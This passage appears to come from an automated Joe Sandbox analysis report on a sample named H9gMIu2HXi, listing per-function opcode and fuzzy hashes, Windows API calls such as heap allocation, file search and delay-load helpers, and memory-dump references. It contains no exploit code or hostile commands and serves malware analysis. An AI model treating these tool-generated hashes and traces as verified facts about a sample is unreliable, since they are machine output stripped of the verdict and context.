                                                                                              • Opcode ID: 56128bfbdacf807a4ca540efb15e0a413c3cb54ea14906d1d8f70a0236741b26
                                                                                              • Instruction ID: 3808c40dcee94c5b1f91c5a64fac81f78eb50b7fe51b7ae970d418ff71a4ce3c
                                                                                              • Opcode Fuzzy Hash: 56128bfbdacf807a4ca540efb15e0a413c3cb54ea14906d1d8f70a0236741b26
                                                                                              • Instruction Fuzzy Hash: D611C432905290AED741EBA8AD16BDC7FB4AB24360F10C06EF54853292DFB516C5CB62
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                                • Part of subcall function 00A4C2F6: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00A4A543,00000001,00000364,?,00A45281,00000050,?,00A63070,00000200), ref: 00A4C337
                                                                                              • _free.LIBCMT ref: 00A4D6A5
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmpDownload File
• Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
Similarity
• API ID: AllocateHeap_free
• String ID:
• API String ID: 614378929-0
• Opcode ID: 7d30b6ea8507d2c13b34e354a80f4644266152c8881b27fa68bdf41323802f68
• Instruction ID: df34442d5f47f331523188916a7ff3e92455fff1affbdf989960cc54b030e0e5
• Opcode Fuzzy Hash: 7d30b6ea8507d2c13b34e354a80f4644266152c8881b27fa68bdf41323802f68
• Instruction Fuzzy Hash: 7F014977200305ABE3218F69DC41D5AFBE8FBD9330F26062DE59C83280EA70A805C778
Uniqueness
• Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
• Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
Similarity
• API ID: H_prolog
• String ID:
• API String ID: 3519838083-0
• Opcode ID: 5a3c0f0637d1d1fb5744151000e004a9ebcc8de7e0ae0db7d3d16adbce54ef85
• Instruction ID: 762be1791188b7c293288a20de934e70baa920bc3684df9538542f752704b1a2
• Opcode Fuzzy Hash: 5a3c0f0637d1d1fb5744151000e004a9ebcc8de7e0ae0db7d3d16adbce54ef85
• Instruction Fuzzy Hash: C70162B1641750BAD221DB299D42F9B7BE8EBC4B00F00452EB655A6282DBB02604C655
Uniqueness
• Uniqueness Score: -1.00%

APIs
• RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00A4A543,00000001,00000364,?,00A45281,00000050,?,00A63070,00000200), ref: 00A4C337
Memory Dump Source
• Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
• Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
Similarity
• API ID: AllocateHeap
• String ID:
• API String ID: 1279760036-0
• Opcode ID: d96f0c5ae3570b54e461003d8f0692f29babc67f6514ab49bd0839c1c63f91ae
• Instruction ID: 1906122e621b55f2309ff573578c17a5f86dfaa5c1a139ae6cf83918a08f22d7
• Opcode Fuzzy Hash: d96f0c5ae3570b54e461003d8f0692f29babc67f6514ab49bd0839c1c63f91ae
• Instruction Fuzzy Hash: F2F0E23E606224A6DFB15F66AD06A5BB798AFC1771B24C021F81DDF090EB30F90192E5
Uniqueness
• Uniqueness Score: -1.00%

APIs
• __EH_prolog.LIBCMT ref: 00A26452
  • Part of subcall function 00A304E5: __EH_prolog.LIBCMT ref: 00A304EA
Memory Dump Source
• Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
• Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
Similarity
• API ID: H_prolog
• String ID:
• API String ID: 3519838083-0
• Opcode ID: 207b0c8bd0f404490c76452f8a449c0617f161c97eaf44368823125026a2e24c
• Instruction ID: fb0399a255ce17d2fe0706bfc5da216ca3ad48b7e40877c7ff3cccd8ce82fda6
• Opcode Fuzzy Hash: 207b0c8bd0f404490c76452f8a449c0617f161c97eaf44368823125026a2e24c
• Instruction Fuzzy Hash: 79010871901754DAD715EBA8C2627EEFBE4AF64710F60445EF47A63282CBB42B08C761
Uniqueness
• Uniqueness Score: -1.00%

APIs
• RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00A4DBEC,00000000,?,00A480B1,?,00000008,?,00A4A871,?,?,?), ref: 00A4A830
Memory Dump Source
• Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
• Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
Similarity
• API ID: AllocateHeap
• String ID:
• API String ID: 1279760036-0
• Opcode ID: 06484221cc2a64c532bfa09f87631a66199b3b6e04a164dfcc5482d058308aab
• Instruction ID: 387bc5adbcd45f9b8255141878a9014070c87ac566a00e646e7fe6fb2814380b
• Opcode Fuzzy Hash: 06484221cc2a64c532bfa09f87631a66199b3b6e04a164dfcc5482d058308aab
• Instruction Fuzzy Hash: 92E06D7E28422256E63127A6AD01BAB3A98DFF27A1F150120BC4696092DB25CC12C2E3
Uniqueness
• Uniqueness Score: -1.00%

APIs
• FindCloseChangeNotification.KERNELBASE(000000FF,?,?,00A2A83D,?,?,?,?,?,00A5380F,000000FF), ref: 00A2A89B
Memory Dump Source
• Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
• Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
Similarity
• API ID: ChangeCloseFindNotification
• String ID:
• API String ID: 2591292051-0
• Opcode ID: 8f81a175aae899ec4ba386348f5be0e4251634667f3cc9324236dca2b9d18c96
• Instruction ID: 03e7a3cfe4166001682477b55c4a8cc444a28b24b9ffd5a82be9cb4dcf2312ca
• Opcode Fuzzy Hash: 8f81a175aae899ec4ba386348f5be0e4251634667f3cc9324236dca2b9d18c96
• Instruction Fuzzy Hash: 54F08231485B259FDB348B28E448792B7E4AB22325F141B6ED0E2439E5D3756A8F8A41
Uniqueness
• Uniqueness Score: -1.00%

APIs
  • Part of subcall function 00A2BA94: FindFirstFileW.KERNELBASE(?,?,?,?,?,?,00A2B98B,000000FF,?,?), ref: 00A2BABD
  • Part of subcall function 00A2BA94: FindFirstFileW.KERNEL32(?,?,?,?,00000800,?,?,?,?,00A2B98B,000000FF,?,?), ref: 00A2BAEB
  • Part of subcall function 00A2BA94: GetLastError.KERNEL32(?,?,00000800,?,?,?,?,00A2B98B,000000FF,?,?), ref: 00A2BAF7
• FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 00A2B991
Memory Dump Source
• Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
• Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
Similarity
• API ID: Find$FileFirst$CloseErrorLast
• String ID:
• API String ID: 1464966427-0
• Opcode ID: fbc8dcfa2f9e764cecd5d20ac4e816d76e69c2cecfe0a3f123c4ecb3dee43e20
• Instruction ID: 5ede75603a531cbaff0ad57b54112a24e977f7b981f7a180693d0021dc917a9c
• Opcode Fuzzy Hash: fbc8dcfa2f9e764cecd5d20ac4e816d76e69c2cecfe0a3f123c4ecb3dee43e20
• Instruction Fuzzy Hash: 25F082320187A0ABCB225BBC69047CBBB906F1A335F148A59F2FE122D2C37450D59732
Uniqueness
• Uniqueness Score: -1.00%

APIs
• SetThreadExecutionState.KERNEL32(00000001), ref: 00A3215D
Memory Dump Source
• Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
• Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
Similarity
• API ID: ExecutionStateThread
• String ID:
• API String ID: 2211380416-0
• Opcode ID: ac0fd11823adf712580e6196080ec24031af372ea3eb7a7930703b4a5dea44ab
• Instruction ID: 9f686cdd5f87592c7d96f45af6a64a2ff99a055da1671f1f608b64bf6e4bd76d
• Opcode Fuzzy Hash: ac0fd11823adf712580e6196080ec24031af372ea3eb7a7930703b4a5dea44ab
• Instruction Fuzzy Hash: D5D0123161812052DE16737C6A56BBD1A665FDA325F1900A6F209571D38B54094793B1
Uniqueness
• Uniqueness Score: -1.00%

APIs
• GdipAlloc.GDIPLUS(00000010), ref: 00A3B63C
  • Part of subcall function 00A3B3C8: GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00A3B3E9
Memory Dump Source
• Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
• Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
Similarity
• API ID: Gdip$AllocBitmapCreateFromStream
• String ID:
• API String ID: 1915507550-0
• Opcode ID: 67c6c0b1a9f8045d953eebf11179e7c179da5fb7bf356439fdf6af47a3be8cb5
• Instruction ID: e14751f23082cfc85a33379e58af355c1d91bec07a23164e49456cfa79e4135a
• Opcode Fuzzy Hash: 67c6c0b1a9f8045d953eebf11179e7c179da5fb7bf356439fdf6af47a3be8cb5
• Instruction Fuzzy Hash: 34D0C7306242097ADF416B618D03A7E7696DB10384F008136BA4599191EBB1D9606575
Uniqueness
• Uniqueness Score: -1.00%

APIs
• __EH_prolog.LIBCMT ref: 00A26925
  • Part of subcall function 00A304E5: __EH_prolog.LIBCMT ref: 00A304EA
Memory Dump Source
• Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
• Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
Similarity
• API ID: H_prolog
• String ID:
• API String ID: 3519838083-0
• Opcode ID: bee3f1dd9f9d012ac0fc3671e6d09c037233c5c85881bb4d0ff41e453dacfdbd
• Instruction ID: 1af96b8de70a825380119fdb73abc523234557506c1127d3ff62a2567437fee2
• Opcode Fuzzy Hash: bee3f1dd9f9d012ac0fc3671e6d09c037233c5c85881bb4d0ff41e453dacfdbd
• Instruction Fuzzy Hash: AED05EB2F105359BCB05BB4895217AEB264EB44705F10016AF411A3782CBB44B008784
Uniqueness
• Uniqueness Score: -1.00%

APIs
• DloadProtectSection.DELAYIMP ref: 00A3F76F
Memory Dump Source
• Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
• Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
Similarity
• API ID: DloadProtectSection
• String ID:
• API String ID: 2203082970-0
• Opcode ID: b8f6fefa775dfaaa6d8bdfcb6c406e4fda857f74cca846a56b0126ba9a559c03
• Instruction ID: 8802dd27bbde51f2010cce697cbdf18936bd870c5bd69152106172e58c6bae5f
• Opcode Fuzzy Hash: b8f6fefa775dfaaa6d8bdfcb6c406e4fda857f74cca846a56b0126ba9a559c03
• Instruction Fuzzy Hash: 5CD01231D70304AFCA51EBB49D4672422B0F30CB19F504D31F541821A1C76065458711
Uniqueness
Uniqueness Score: -1.00%

APIs
• SendDlgItemMessageW.USER32(0000006A,00000402,00000000,00000000,00A32E88), ref: 00A3EEE2
  • Part of subcall function 00A3C758: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00A3C769
  • Part of subcall function 00A3C758: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00A3C77A
  • Part of subcall function 00A3C758: IsDialogMessageW.USER32(0001046C,?), ref: 00A3C78E
  • Part of subcall function 00A3C758: TranslateMessage.USER32(?), ref: 00A3C79C
  • Part of subcall function 00A3C758: DispatchMessageW.USER32(?), ref: 00A3C7A6
Memory Dump Source
• Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
• Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
Similarity
• API ID: Message$DialogDispatchItemPeekSendTranslate
• String ID:
• API String ID: 897784432-0
• Opcode ID: 655087c58a4fc15d71ae2a01ca54fe927b66a1410ec14c37ea6fff945e174ce0
• Instruction ID: 8772723b47c2a1a0c09da63d349718525b5a2e0b301762b1c4dd123356625ed8
• Opcode Fuzzy Hash: 655087c58a4fc15d71ae2a01ca54fe927b66a1410ec14c37ea6fff945e174ce0
• Instruction Fuzzy Hash: 0FD09E32144240AED6026B51CE06F0A7AF2BB98B05F004554B645340B1C6A29D21AF02
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetFileType.KERNELBASE(000000FF,00A2AA1E), ref: 00A2AB28
Memory Dump Source
• Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
• Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
Similarity
• API ID: FileType
• String ID:
• API String ID: 3081899298-0
• Opcode ID: 5cc849e5027777c2e4a788204441fe39f6156593a5f4a8a5d78612f9b6010480
• Instruction ID: 4946f589b84d86ff9c16a8ae50b871d58526c89ab23037ea5e899721e9ec502c
• Opcode Fuzzy Hash: 5cc849e5027777c2e4a788204441fe39f6156593a5f4a8a5d78612f9b6010480
• Instruction Fuzzy Hash: 28C01234400215878E304B68B8540557623EB623767B493A5C065C50A1C3268C83E502
Uniqueness
Uniqueness Score: -1.00%

APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 00A3F33D
  • Part of subcall function 00A3F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A3FA5C
  • Part of subcall function 00A3F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A3FA6D
Memory Dump Source
• Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
• Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID:
• API String ID: 1269201914-0
• Opcode ID: 4789121eb8a7fec946e68dd7e651721ac7c1f6f307003b87026b5e80b50f5b4c
• Instruction ID: 6da8afc8c7a9b37737fb3f9016c6617634631d140e22b0fa947afdeb77ad5445
• Opcode Fuzzy Hash: 4789121eb8a7fec946e68dd7e651721ac7c1f6f307003b87026b5e80b50f5b4c
• Instruction Fuzzy Hash: E9B01291A79002BD3254B1642D07F36032CE4D0F117308D3FFC00C4140D4500C091231
Uniqueness
Uniqueness Score: -1.00%

APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 00A3F33D
  • Part of subcall function 00A3F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A3FA5C
  • Part of subcall function 00A3F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A3FA6D
Memory Dump Source
• Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
• Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID:
• API String ID: 1269201914-0
• Opcode ID: b914657c5ed47610d2bf1be81e348f83f75c9059c4c4319ebad720c14e490e0b
• Instruction ID: bca7d913a76b2776226b9a31c550defeaba576586a6874d1d41080915b021f72
• Opcode Fuzzy Hash: b914657c5ed47610d2bf1be81e348f83f75c9059c4c4319ebad720c14e490e0b
• Instruction Fuzzy Hash: F1B012A1A790027D3254B1242D07F3A022CE4D0B11730993FFC00C4040D4400C051231
Uniqueness
Uniqueness Score: -1.00%

APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 00A3F33D
  • Part of subcall function 00A3F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A3FA5C
  • Part of subcall function 00A3F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A3FA6D
Memory Dump Source
• Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
• Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID:
• API String ID: 1269201914-0
• Opcode ID: d4de59858c9c55b0e39232bf688a90bb50a20cc8193a49eaca9249ff7949947d
• Instruction ID: 3d5488c30e077d0c2929d57bedef38af6cfcfff26065a0d3ee40aaa9ea5a64df
• Opcode Fuzzy Hash: d4de59858c9c55b0e39232bf688a90bb50a20cc8193a49eaca9249ff7949947d
• Instruction Fuzzy Hash: E8B012A5A790027D3254B1242E07F36022CE4D0B11730593FFC00C8040D4800D061231
Uniqueness
Uniqueness Score: -1.00%

APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 00A3F33D
  • Part of subcall function 00A3F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A3FA5C
  • Part of subcall function 00A3F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A3FA6D
Memory Dump Source
• Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
• Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID:
• API String ID: 1269201914-0
• Opcode ID: 84d106c573f07b4ce594d155a6b2a41cd6ce5cbcf77987563032c37f395d9ce8
• Instruction ID: c487175b0f813e6f287010b73944e8cd420253d4500c16045b1ca49cc480e8d9
• Opcode Fuzzy Hash: 84d106c573f07b4ce594d155a6b2a41cd6ce5cbcf77987563032c37f395d9ce8
• Instruction Fuzzy Hash: 9CB01291A790027D3254B5242D07F3A022CD4D0B11730C93FFC00C4140D4500C091231
Uniqueness
Uniqueness Score: -1.00%

APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 00A3F33D
  • Part of subcall function 00A3F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A3FA5C
  • Part of subcall function 00A3F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A3FA6D
Memory Dump Source
• Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
• Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID:
• API String ID: 1269201914-0
• Opcode ID: fc666e17e48fbac209d14d1ce93777856b47dbc7d7a9fa05bf1134d5bb000e6c
• Instruction ID: 523889e9584d26b615c37ff51372bb8e23a697fbd72eda1db2a5b0c756788287
